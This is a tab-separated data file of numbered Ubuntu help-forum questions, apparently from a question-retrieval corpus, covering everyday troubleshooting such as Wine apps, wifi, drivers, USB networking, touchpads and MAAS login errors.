380750	netflix-desktop posts an alert and an unexpected server response when i try to start it from gui	so my problem is , `` when i start netflix-desktop from the icon on my ubuntu 12.04lts desktop it opens the window with and 'alert ' dialog box and then the 'webpage ' that says unexpected response from server . however when i run 'netflix-desktop ' from the terminal it will open just fine and i can run it without any errors but it still shows and error in the terminal like this . root @ gabriel-rx885aa-aba-a6000n : ~ # netflix-desktop wine : /home/gabriel/.wine-browser is not owned by you wine : /home/gabriel/.wine-browser is not owned by you wine : /home/gabriel/.wine-browser is not owned by you rm : can not remove `/home/gabriel/.wine-browser/drive_c/browser-profile/pluginreg.dat ' : no such file or directory so does anyone have any ideas . it 's not like it 's essential to me that it be fixed because i can still run it from terminal but it 's easier to run from the desktop rather than from terminal . also note that i 'm not using the unity desktop . so i tried following a code set to remove netflix-desktop which involved purging the ppa : ehoover/compholio and now i get this everytime i try to do anything . software center no longer opens either . e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/ehoover-compholio-precise.list e : the list of sources could not be read . i 'm just trying to switch over completely from windows but clearly i 'm a huge noob .
380751	what does it mean that the ubuntu installation is read-only on mobile devices	i know that after switching to system images for ubuntu on mobile devices that meant making the installation read-only . yet i do n't quite understand whether that means that the whole os is ro , as obviously system logs are updated , the home folder can be written to with e.g . user media and new click packages are installed in /opt . so what does it exactly mean that the images are read-only , which areas are actually read-write , and how is that possible ?
380756	how to increase or decrease system volume from terminal ?	how to increase or decrease overall system volume from terminal like i was doing it in the gui ?
380758	rsyslogd using 100 % cpu creating huge syslog and kern.log files	and here is output from command tail -5 syslog nov 22 14:02:16 adam-ixtreme-8550 kernel : [ 10995.487954 ] saa7133 [ 0 ] /irq : looping -- clearing pe ( parity error ! ) enable bit nov 22 14:02:16 adam-ixtreme-8550 kernel : [ 10995.488022 ] saa7133 [ 0 ] /irq [ 10,4297641167 ] : r=0xfffffff7 s=0xffffffff done_ra0 done_ra1 done_ra2 ar pe pwr_on rdcap intl fidt mmc trig_err conf_err load_err gpio16 gpio18 gpio22 gpio23 | ra0=vbi , b , odd,15 nov 22 14:02:16 adam-ixtreme-8550 kernel : [ 10995.488022 ] saa7133 [ 0 ] /irq : looping -- clearing pe ( parity error ! ) enable bit nov 22 14:02:16 adam-ixtreme-8550 kernel : [ 10995.488352 ] saa7133 [ 0 ] /irq [ 10,4297641168 ] : r=0xfffffff7 s=0xffffffff done_ra0 done_ra1 done_ra2 ar pe pwr_on rdcap intl fidt mmc trig_err conf_err load_err gpio16 gpio18 gpio22 gpio23 | ra0=vbi , b , odd,15 nov 22 14:02:16 adam-ixtreme-8550 kernel : [ 10995.488363 ] saa7133 [ 0 ] /irq : looping -- clearing pe ( parity error ! ) enable bit somehow this process starts when i start watching youtube videos . maby it refers somehow to flash ?
380760	can not get google earth to run in ubuntu 12.04	from where should we launch google earth in ubuntu 12.04 we can not get it to run , after successful download & install . the site keeps putting one back to the information page . g-e worked fine with previous versions . what next ?
380767	please change the permissions to 0770 so that the directory	i did everything according to : http : //forum.owncloud.org/viewtopic.php ? f=17 & t=7118 but i get the error : data directory ( /mnt/usbdrive/owncloud/ ) is readable for other users please change the permissions to 0770 so that the directory can not be listed by other users . i gave the permissions like : chmod 0770 /mnt/usbdrive/owncloud/ and i changed my /etc/fstab i used : chown -r www-data : www-data /mnt/usbdrive/owncloud/ as well . but i still get that error when going to owncloud this is what my /etc/fstab looks like : edit : this error only comes up when i change the data directory . if i keep it the same , i can acces it normally .
380769	internal mic does n't work anymore after upgarding to 13.04	after upgrading to 13.04 the internal mic of my vostro 3360 doesn n't work anymore . `` build in audio '' is detected and alsamixer installed . suggestions how to fix ?
380770	glib error : two different plugins tried to register 'basicenginefc '	every time , i start a gtk program ( such as nautilus ) from command link , those errors repeat again and again : ... ( nautilus:9156 ) : glib-gobject-warning ** : two different plugins tried to register 'basicenginefc ' . ( nautilus:9156 ) : glib-gobject-critical ** : g_object_new : assertion 'g_type_is_object ( object_type ) ' failed ... what 's the matter with it ?
380775	how to open two windows simultaneously ?	i want two window open , one pdf and gedit , so that i can type in gedit from seeing pdf , but when i click in gedit , the pdf minimizes automatically . is there a way to keep both the windows open ?
380776	stabilizing characters like ` < > ` , ` { } ` and ` [ ] `	when the language layout is changed to a right to left language ; in some standard editing places ( e.g . the address bar of google chrome ) , characters like < , { and [ automatically become > , } and ] just by changing language layout . is there a way to prevent this and make these characters stable ?
380778	do ssd/hd hybrids increase performance in ubuntu ?	there are mass storage drives that consist of a large hdd and a smaller part of flash memory . from the computer 's point of view they act just as a normal hard drive , but internally the disk internally moves frequently used portions to the ssd part for performance increase . an example for this type of drive is the seagate laptop sshd st1000lm014 . are there any reported performance increases compared to a pure hard drive when using ubuntu ( or any linux distribution for that matter ) or does the internal software of the drive rely on ntfs file system features ? since there are no additional drivers needed i do not expect software problems , but i could not find any reports of how this works . and googling for sshd and linux leads to no relevant results for obvious reasons . ps : i hope you do not read this as a shopping recommendation . i am not looking for a specific product , but want to know whether drives with this concept are useful for ubuntu systems ?
380781	netbeans problem with file permisions	after installing netbeans 7.40 and using it for java projects the following problem came up . after creating accidentally a class , when i try to delete it i get a message saying error : permission denied anyone any idea why is this happening ? i 'm on ubuntu 13.10 . i installed netbeans downloading netbeans-7.4-javase-linux.sh from netbeans site . also when i cd /usr/local/netbeans-7.4/bin and sudo ./netbeans things are ok .
380789	upgrade from lucid to precise	i am running lucid , and would like to upgrade to precise . i have changed the settings in update manager to `` long term support releases only '' , but i only get the option `` new ubuntu release '10.10 ' is available '' . i thought it was possible to upgrade directly from one lts to the next ( i.e . go direct from lucid to precise ) . is that right , or would i have to go through all the intermediate versions ? to add some extra details , running `` lsb_release -a '' gives : no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid in /etc/update-manager/release-upgrades i have prompt=lts running do-release-upgrade gives the output : checking for a new ubuntu release failed upgrade tool signature failed upgrade tool done downloading failed to fetch fetching the upgrade failed . there may be a network problem . carlos .
380792	cairo dock opens nautilus minimized	my problem is that when i click on the files icon on the cairo dock or select a folder from the shortcut icon , the window does n't always popup , instead it opens minmized and a notification of the window appear in the cairo dock and the launcher , and this only happens with nautilus
380795	remove `` time & date settings '' button from panel	is it possible to remove `` time & date settings '' button and not removing time , calendar http : //i.cubeupload.com/jtoi6p.jpg ubuntu 12.04
380797	safest way to install missing drivers on my acer laptop ?	i 'm new to ubuntu . i need to install nvidia geforce 710m driver and qualcomm atheros bluetooth driver on my acer aspire v5-471g . how can i install these drivers ?
380800	post data received from usb device dynamically to hosted web site	i have an application i am trying to implement . i have ubuntu 13.10 on a pc running a lamp server . i want to plug in usb devices that output data and display the data dynamically as the data is received on an internally hosted web site . i have constructed a crude web site with forms that i want to display the data in but am stuck on how to port the usb data to it . any help is appreciated .
380801	apt-get update for a particular repository	consider a situation like this : i am going to install ubuntu on an uefi system ( dual boot with windows ) where i need to install boot-repair . when i run sudo apt-get update it will update cache for all the repos . i need to update only a particular ppa ( yannubuntu/boot- repair ) to install boot-repair . many times i had to update all the repos when i think updating a single ppa is enough . questions is there any problem/harm if i update only one repo ? can it affect the software installation in any way ? if the answer is no then how could i update a particular repo ?
380803	how can i run ubuntu inside a virtual machine on windows 7 ?	when i tried to run ubuntu in windows virtual pc i got this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot â please use a kernel appropriate for your cpu later i learnt about enabling the virtualisation in the bios but i saw it is already enabled . why am i unable to run it ?
380807	newly installed 12.04 makes wifi unbearably slow	i installed 12.04 a few days ago on a sony vgn-fz260e laptop . the wifi speed is almost nonexistent . i 've tried the disabling wireless n trick , maybe not correctly but whatever i did did n't work . before i go out and try some of the suggestions i see out there for other posts , does anyone have ideas on what the top problems might be and their solutions ? wireless n ? , need wicd , disabling the power management for the wireless chipset . ? ? any help is great , thanks
380808	ubuntu 13.10 and nvidia video adapter	i have a system76 bonobo laptop , which has a geforce gt 560m . when the laptop comes back from suspend , the video is weird , i need to power cycle the laptop to have it functional . so i suspect a problem with video driver . did i need to install other video drivers or just keep those installed in 13.10 ? my setup use a dual screen , but i would like to have dynamic reconfiguration when i plug or unplug my external monitor .
380809	installing guiffy on ubuntu	i chose linux x86 from this page : http : //www.guiffy.com/download/download.html upon running the installation script , i got this error : the installer can not run in this ui mode . to specify the interface mode , use the -i command-line option , followed by the ui mode identifier . the valid ui modes identifiers are gui , console , and silent . running the script with -i gui , -i console , or -i silent does not help either . how do i workaround this ?
380810	internet over usb on beaglebone black	i 've recently installed ubuntu 13.04 on the beagle bone black . this image : https : //rcn-ee.net/deb/flasher/raring/bbb-emmc-flasher-ubuntu-13.04-2013-10-08.img.xz this microcontroller allows to share internet connection between host pc ( version 12.04 ( precise ) ( 64-bit ) , kernel linux 3.2.0-56-generic ) and beaglebone over usb , so i went for it and configured the device as follows : beaglebone black : ifconfig usb0 192.168.7.2 route add default gw 192.168.7.1 host pc : sudo su # eth0 is my internet facing interface , eth3 is the beaglebone usb connection ifconfig eth2 192.168.7.1 iptables -- table nat -- append postrouting -- out-interface eth0 -j masquerade iptables -- append forward -- in-interface eth2 -j accept echo 1 > /proc/sys/net/ipv4/ip_forward after that internet connection works itself , when i do ping 8.8.8.8 i get the results : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=47 time=4.63 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=47 time=4.68 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=47 time=4.57 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=47 time=4.58 ms ^c -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3005ms rtt min/avg/max/mdev = 4.578/4.620/4.682/0.063 ms to have dns configured too i typed aswell echo `` nameserver 8.8.8.8 '' > > /etc/resolv.conf but unfortunately when i do ping google.com i get , after few seconds of computing , ping : unknown host google.com so - i know , that this solution is n't good , but for this session it could work and it does n't . what 's more , both - bbb and pc - use resolvconf . to be honest i 've got no clue how to configure network using this program ... i tried changing /etc/network/interfaces on beagle bone black like this : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # auto eth0 iface eth0 inet dhcp # example to keep mac address between reboots # hwaddress ether de : ad : be : ef : ca : fe # wifi example # auto wlan0 # iface wlan0 inet dhcp # wpa-ssid `` essid '' # wpa-psk `` password '' # ethernet/rndis gadget ( g_ether ) # ... or on host side , usbnet and random hwaddr # note on some boards , usb0 is automaticly setup with an init script # in that case , to completely disable remove file [ run_boot-scripts ] from the boot partition auto usb0 iface usb0 inet static address 192.168.7.2 netmask 255.255.252.0 network 192.168.7.0 # broadcast 192.168.7.3 gateway 192.168.7.1 dns-nameservers 8.8.8.8 8.8.4.4 but it did n't help . i do n't know what else should i do . please help . additional useful infos : beagle bone black : ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) usb0 link encap : ethernet hwaddr ce:39 : f3:4a : c7:94 inet addr:192.168.7.2 bcast:192.168.7.3 mask:255.255.255.252 inet6 addr : fe80 : :cc39 : f3ff : fe4a : c794/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:608 errors:0 dropped:0 overruns:0 frame:0 tx packets:375 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:57484 ( 57.4 kb ) tx bytes:63078 ( 63.0 kb ) route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.7.1 0.0.0.0 ug 0 0 0 usb0 192.168.7.0 * 255.255.255.252 u 0 0 0 usb0 uname -a linux arm 3.8.13-bone28 # 1 smp fri sep 13 03:12:24 utc 2013 armv7l armv7l armv7l gnu/linux /etc/resolv.conf nameserver 8.8.8.8 nameserver 8.8.4.4 # domain localdomain # search localdomain # nameserver 192.168.1.1 pc : ifconfig eth0 link encap : ethernet hardware adresse 00:17:31:8d:6a : a6 inet adresse:141.3.81.154 bcast:141.3.83.255 maske:255.255.252.0 inet6-adresse : fe80 : :217:31ff : fe8d:6aa6/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:30732 errors:0 dropped:0 overruns:0 frame:0 tx packets:5888 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:7266589 ( 7.2 mb ) tx-bytes:1286462 ( 1.2 mb ) interrupt:19 eth1 link encap : ethernet hardware adresse 00:04:75 : ca:98 : ee up broadcast multicast mtu:1500 metrik:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) interrupt:21 basisadresse:0xe400 eth2 link encap : ethernet hardware adresse c8 : a0:30 : ac:2c:95 inet adresse:192.168.7.1 bcast:192.168.7.3 maske:255.255.255.252 inet6-adresse : fe80 : :caa0:30ff : feac:2c95/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:418 errors:0 dropped:0 overruns:0 frame:0 tx packets:637 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:45704 ( 45.7 kb ) tx-bytes:88161 ( 88.1 kb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:16436 metrik:1 rx packets:840 errors:0 dropped:0 overruns:0 frame:0 tx packets:840 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:142988 ( 142.9 kb ) tx-bytes:142988 ( 142.9 kb ) route ziel router genmask flags metric ref use iface default i60-gw-int.ipr . 0.0.0.0 ug 0 0 0 eth0 141.3.80.0 * 255.255.252.0 u 1 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth2 192.168.7.0 * 255.255.255.252 u 1 0 0 eth2 uname -a linux i60p354 3.2.0-56-generic # 86-ubuntu smp wed oct 23 09:20:45 utc 2013 x86_64 x86_64 x86_64 gnu/linux what can be important - pc , which share internet with bbb works in the university network , which is far more complicated than normal home network - could that cause problems with dns resolving ? whats important yet - if i set a nameserver that makes sense in resolv.conf.d/head ( which is simply up and running like 8.8.8.8 ) and type ping google.com the maschine computes for some time and than returns error unknown host . if i set a nonsense adress , which surely does n't work ( ie 123.123.123.123 ) error is being returned immediately .
380812	unable to connect my mts mblaze netsetter to internet sometimes	i 'm using dual boot system with windows 8 and ubuntu . i installed ubuntu 12.04 lts i have mts mblaze dongle . i have set up the mts connection profile under the mobile broadband . my problem is that sometimes my connection is easily made and i use it , sometimes , it never connects , so i have to restart my system , then it connects to internet sometimes . right now it 's not connecting even i restarted my system many times , just it shows trying to connect icon once , then never tries to connect . while in windows it 's working fine .
380813	usb headset conflicts with mouse	well , i 'm trying to use a plantronics headset , in ubuntu 13.10 , the sound works fine , but the mouse start with a crazy behavior , missing clicks and things like that , ( seems that the mouse can operate just in the first program that i click . ) if i remove the headset the mouse get normal . i do n't know what is that , for me , it 's do n't make any sense . if anyone have some idea , please let me know . thanks =d .
380819	thunderbird send button does not work when sending to more than one recipient	was going to post this as a bug , but i 'll try here first ... thunderbird 24.1.0 ubuntu 12.04 lts ( i am assuming since a recent update in the last few days ) i find that it is impossible to send an email to more than one receipient . any attempt to cc , bcc or add multiple 'to : ' recipients ends up with a 'dead ' send button , and the email . there 's no error . trying to send via file/send now or file/send later also fails , as does ctrl+rtn . the bug seems somewhat intermittent . if ccs/bccs are already in the address book and added via the automatic dropdown that appears as you type , the email will send . a 'new ' email address that is simply typed into the bcc/cc line results in an email that will not send . nothing appears in the error console . i wonder if this is connected to another bug where clicking on the address book icon in the main client window brings up an empty address book , even though the address book is actually large and available when composing a new email .
380820	problem after dual boot installation	i installed ubuntu a while ago in a dual boot . it worked ok with windows ; but then my windows got a bug because of a virus . since then , i can only boot on ubuntu , windows just wo n't boot . in the meanwhile , i ca n't modify anything on the part of my hard disk which is dedicated to windows ; i can read it but ca n't modify it , and i ca n't even do a new hard disk repartition . how can i solve that ? i fear a bit that by installing a new version of ubuntu it should cause problems . can i just erase everything and install the new version of ubuntu ? thanks in advance
380822	resolution limited to 1280x720	i have purchased new asus p8h61-m lx2 motherboard with inbuilt intel graphics . the manual says that it supports maximum 1920x1200 @ 60hz on dvi-d/hdmi and 2048x1536 @ 75hz on display port . i have hp zr2740w monitor which supports maximum 2560x1440 . i am using only dvi-d cable since there is no display port on my cpu . however i get only 1280x720 resolution in ubuntu 12.04 . i tried to add new resolutions ( mentioned above ) using xrandr but the screen turns blank . how to fix this ? early helps will be appreciated a lot . for more information , here is an output of xrandr -- current : screen 0 : minimum 320 x 200 , current 1280 x 720 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 1280x720 59.9* dp1 disconnected ( normal left inverted right x axis y axis ) i tried to add manually 1920x1080 @ 60hz , 2560x1440 @ 60hz and few other combinations but nothing seems to be working and the screen gets blank .
380824	`` error : no suitable mode found , booting however ''	i 'm fairly new at linux and ubuntu so i 'm having some trouble figuring out a particular issue . so i recently installed xubuntu as a second partition on a laptop running windows 8.1 . but when i restarted my laptop i ended up in the grub prompt . i have come as far as finding out it has something to do with setting the kernel manually and have managed the following : set root= ( hd0 , gpt8 ) linux /boot/vmlimuz ... root=/dev/sda8/ initrd /boot/initrd.img ... boot i did this and was left with '' error : no suitable mode found booting however '' anyone who can help me here ? and please tell me if any more information is needed !
380825	trackpoint and clickpad : enable buttons and scroll ( lenovo t440s )	i just got a lenovo t440s which is equiped with synaptics touchpad . by default there 's no middle button and right button is at right bottom corner of touchpad . i 'm used to the combination of trackpointer+left/middle/right buttons and i really miss that on my new model . it generates some noise every time i press the button , since the button is also a part of touchpad . what i did so far is : increase hysteresis of touchpad to a very high value , which literally disabled navigation enable clickpad mode , which provides functions of middle/right button define middle/right button area as expected on touchpad but the problem is that middle button is not mapped to trackpointer . they seem to be two independent devices on this model . i 'm wondering how i can connect the event triggered by middle button to the wheel emulation button of trackpointer . here 's the output of my xinput properties : xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=10 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ integrated camera id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=12 [ slave keyboard ( 3 ) ] synps/2 synaptics touchpad : device 'synps/2 synaptics touchpad ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 1 device accel constant deceleration ( 257 ) : 2.500000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 12.500000 synaptics edges ( 260 ) : 1726 , 4858 , 1577 , 3665 synaptics finger ( 261 ) : 25 , 30 , 256 synaptics tap time ( 262 ) : 180 synaptics tap move ( 263 ) : 192 synaptics tap durations ( 264 ) : 180 , 180 , 100 synaptics clickpad ( 265 ) : 1 synaptics tap fasttap ( 266 ) : 0 synaptics middle button timeout ( 267 ) : 0 synaptics two-finger pressure ( 268 ) : 282 synaptics two-finger width ( 269 ) : 7 synaptics scrolling distance ( 270 ) : 87 , 87 synaptics edge scrolling ( 271 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 272 ) : 1 , 1 synaptics move speed ( 273 ) : 1.000000 , 1.750000 , 0.045725 , 40.000000 synaptics edge motion pressure ( 274 ) : 30 , 160 synaptics edge motion speed ( 275 ) : 1 , 349 synaptics edge motion always ( 276 ) : 0 synaptics off ( 277 ) : 2 synaptics locked drags ( 278 ) : 0 synaptics locked drags timeout ( 279 ) : 5000 synaptics tap action ( 280 ) : 0 , 0 , 0 , 0 , 0 , 0 , 0 synaptics click action ( 281 ) : 1 , 3 , 0 synaptics circular scrolling ( 282 ) : 0 synaptics circular scrolling distance ( 283 ) : 0.100000 synaptics circular scrolling trigger ( 284 ) : 0 synaptics circular pad ( 285 ) : 0 synaptics palm detection ( 286 ) : 0 synaptics palm dimensions ( 287 ) : 10 , 200 synaptics coasting speed ( 288 ) : 20.000000 , 50.000000 synaptics pressure motion ( 289 ) : ... of unknown type cardinal synaptics pressure motion factor ( 290 ) : 1.000000 , 1.000000 synaptics resolution detect ( 291 ) : 1 synaptics grab event device ( 292 ) : 1 synaptics gestures ( 293 ) : 1 synaptics capabilities ( 294 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 295 ) : 42 , 42 synaptics area ( 296 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 297 ) : 3656 , 0 , 1000 , 0 , 2600 , 3619 , 1000 , 3000 synaptics noise cancellation ( 298 ) : 500 , 500 device product id ( 250 ) : 2 , 7 device node ( 251 ) : `` /dev/input/event5 '' xinput list-props 11 : device 'tpps/2 ibm trackpoint ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 0 device accel constant deceleration ( 257 ) : 1.000000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 10.000000 device product id ( 250 ) : 2 , 10 device node ( 251 ) : `` /dev/input/event6 '' evdev axis inversion ( 300 ) : 0 , 0 evdev axes swap ( 302 ) : 0 axis labels ( 303 ) : `` rel x '' ( 143 ) , `` rel y '' ( 144 ) button labels ( 304 ) : `` button left '' ( 136 ) , `` button middle '' ( 137 ) , `` button right '' ( 138 ) , `` button wheel up '' ( 139 ) , `` button wheel down '' ( 140 ) , `` button horiz wheel left '' ( 141 ) , `` button horiz wheel right '' ( 142 ) evdev middle button emulation ( 305 ) : 0 evdev middle button timeout ( 306 ) : 50 evdev third button emulation ( 307 ) : 0 evdev third button emulation timeout ( 308 ) : 1000 evdev third button emulation button ( 309 ) : 3 evdev third button emulation threshold ( 310 ) : 20 evdev wheel emulation ( 311 ) : 1 evdev wheel emulation axes ( 312 ) : 6 , 7 , 4 , 5 evdev wheel emulation inertia ( 313 ) : 10 evdev wheel emulation timeout ( 314 ) : 200 evdev wheel emulation button ( 315 ) : 2 evdev drag lock buttons ( 316 ) : 0 i googled around and checked lots of threads and failed to find a proper solution . but when i use windows 8.1 on this model and install synaptics touchpad driver , it 's working perfectly . so another proposal is to port that driver to linux . any help would be appreciated thanks in advance !
380827	how to change ldap basedn ( root dc )	i need to change openldap basedn . i mean changing example.com ( dc=example , dc=com ) into newexample.net ( dc=newexample , dc=net ) . should i simply change in the configuration file ( /etc/ldap/ldap.conf ) ? moreover , there are some services which are configured according the previous domain name , do they get somehow synchronized automatically with the new name , or i should modify them one by one ?
380829	unexplained nightly system shutdown	i recently took over a dell xps 9100 , installed ubuntu 12.04 via pxeboot . i have done big builds and long over-the-net fetches with the machine . in system settings = > power , for suspend when inactive for , i have do n't suspend . i was planning to use this machine for overnight builds . it has never crashed in my presence . however , each morning , i discover the machine is off , not merely suspended . i have not been able to find evidence of an automatic shutdown , but i may not be looking in the right places . running last -f /var/log/wtmp , i see entries like : myuserid pts/2 :0 thu nov 21 18:37 - crash ( 12:17 ) . but i think this just means i did n't log off . grepping thru /var/log/* only showed shutdown in this file . how do i find the root cause of this automated shutdown or crash ?
380832	automate additional logon information is required to connect to this network	basically i want to automatically login on start-up.my isp asks for this credentials and i have to login each time i logout . i want to login whenever i start my computer . additional info : my isp 's login form asks to insert my credentials in a browser and i have keep that tab open all time.here is the source . http : //pastebin.com/zie0dvcd my isp does n't have any applications for this purpose and i could n't automate this in windows .
380833	maas-cli login always returns 403 forbidden	i have a test setup running with a maas server , a juju server and a number of nodes in the maas cluster . after i reinstalled my maas server ( and subsequently the juju-core server ) with saucy instead of precise , certain things definitely improved while , at least one other thing seems to be broken now . the maas-cli . i always get an error : httplib2.socks.httperror , 403 , forbidden . i also created a new maas key/oauth token , but to no avail . i have a couple of machines , that have different number of disks in the cluster . but they have the same number of cpus and the same amount of memory . according to this article on juju charm restraints . i can also use tags as constraints in the deployment process to distinguish between the nodes . as i 'm seemingly unable to tag the nodes through the maas web ui , i wanted to use the maas-cli . on precise it worked well , i used it to release nodes etc . but on saucy i have n't even once been able to at least login . i always get : traceback ( most recent call last ) : file `` /usr/lib/python2.7/runpy.py '' , line 162 , in _run_module_as_main `` __main__ '' , fname , loader , pkg_name ) file `` /usr/lib/python2.7/runpy.py '' , line 72 , in _run_code exec code in run_globals file `` /usr/lib/python2.7/dist-packages/maascli/__main__.py '' , line 20 , in < module > main ( ) file `` /usr/lib/python2.7/dist-packages/maascli/__init__.py '' , line 46 , in main options.execute ( options ) file `` /usr/lib/python2.7/dist-packages/maascli/cli.py '' , line 70 , in __call__ description = fetch_api_description ( options.url , options.insecure ) file `` /usr/lib/python2.7/dist-packages/maascli/api.py '' , line 71 , in fetch_api_description ascii_url ( url_describe ) , `` get '' , insecure=insecure ) file `` /usr/lib/python2.7/dist-packages/maascli/api.py '' , line 60 , in http_request return http.request ( url , method , body=body , headers=headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1569 , in request ( response , content ) = self._request ( conn , authority , uri , request_uri , method , body , headers , redirections , cachekey ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1316 , in _request ( response , content ) = self._conn_request ( conn , request_uri , method , body , headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1251 , in _conn_request conn.connect ( ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 900 , in connect self.sock.connect ( ( self.host , self.port ) + sa [ 2 : ] ) file `` /usr/lib/python2.7/dist-packages/httplib2/socks.py '' , line 424 , in connect self.__negotiatehttp ( destpair [ 0 ] , destpair [ 1 ] ) file `` /usr/lib/python2.7/dist-packages/httplib2/socks.py '' , line 390 , in __negotiatehttp raise httperror ( ( statuscode , statusline [ 2 ] ) ) httplib2.socks.httperror : ( 403 , 'forbidden ' ) the maas.log does not hold anything regarding this issue . it holds error messages about oauth and that a request was unauthorized . but that 's an 'old ' message . no new messages seem to be written to that log . error 2013-11-22 09:35:37,592 maasserver traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 115 , in get_response response = callback ( request , *callback_args , **callback_kwargs ) file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func response = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 128 , in __call__ actor , anonymous = self.authenticate ( request , rm ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 103 , in authenticate if not authenticator.is_authenticated ( request ) : file `` /usr/lib/python2.7/dist-packages/maasserver/api_auth.py '' , line 57 , in is_authenticated raise oauthunauthorized ( error ) oauthunauthorized how can i resolve this ?
380834	choice of wifi network	at home there are two wireless access points and in a certain room the signal strength of the first one is very low while the signal of the second one is relatively stronger . however , ubuntu insists on trying to connect to the first access point in the order they were added irrespective of signal strength . is there a way to make sure ubuntu selects the access point automatically on the basis of signal strength ? edit the access points have different ssids .
380838	system76 panp9 intermittent wifi , mouse	my system76 notebook has been rock solid since i bought it about 10 months ago , i did a fresh install of 13.10 64bit , without issues . everything was working just as it should , until about 2 weeks ago , when i began to have a problem with wifi . upon resuming by opening the notebook lid , i get the normal prompt for a password , and upon unlocking , networking is disconnected . i attempt to re-establish connection by hitting the wifi icon/enable networking , nothing . at this point i attempt a reboot by clicking the power icon/restart . i get the prompt to restart , even i confirm , then nothing . i have to hard shutdown to reboot . this again does n't happen every time i suspend/resume . if that is n't enough , now i 'm having an issue with the trackpad intermittently freezing , which again needs a hard reboot to rectify . i have the current system76-drivers installed , and have n't had this issue with any previous ubuntu release . how can i resolve this ?
380839	13.04 uninstall problems	after 13.04 uninstall can not boot , error on loading operating system screen , 3fe88167-5f37-42ba-a17b-a94e5dc9a312 entering rescue mode grub rescue > computer will not boot from cd or usb hardrive , with either windows cd or 13.04 installation disc . bios has been set to boot from cd and usb hardrive when either is used . op windows 7 64bit .
380840	how to use phone like desktop pc	i want to buy lenovo p780 and to use it like desktop pc . the idea is described in www.ubuntu.com but as i see i need to buy the docking station for this device . could anyone knows which exactly docking station needed for this goal ?
380842	save document in win office ( playonlinux )	sorry if this is a dumb question but i am getting stressed here . i am trying to save a document ( in word 2010 using play on linux ) and when i click save it a windows `` window '' pops up to save the file . i save it but i ca n't find it in the ubuntu `` explorer '' . it is like if it was saved to a virtual machine within playonlinux and i ca n't retrieve it nor find it . ( when i open it from word 2010 it shows in the open dialogue window ) . please help me . i hope i have put all the info needed . thanks . i have ubuntu 12.04
